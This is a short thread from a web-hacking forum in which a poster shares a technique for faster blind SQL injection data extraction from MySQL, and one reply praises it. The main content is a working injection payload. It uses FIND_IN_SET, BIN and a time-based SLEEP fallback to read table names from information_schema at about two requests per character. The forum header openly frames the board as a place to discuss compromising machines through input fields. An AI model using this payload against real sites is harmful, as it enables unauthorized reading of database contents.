Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Faster blind injection data extraction
Posted by: lightos
Date: April 01, 2011 08:49AM

I was researching ways to retrieve data from a MySQL database with less requests than the traditional methods (Bisection, Bit Shift). I found a way to accomplish this with as little as 2 requests per character using this query:

AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), 'a,b,c,d,e,f
,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,
$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ,')),1,1) FROM
information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5));

For a detailed explanation:
[websec.ca]

Options: ReplyQuote
Re: Faster blind injection data extraction
Posted by: Kyo
Date: April 02, 2011 08:40AM

Cool stuff! I've been doing it the lazy way, but this is really clever.

Options: ReplyQuote


Sorry, only registered users may post in this forum.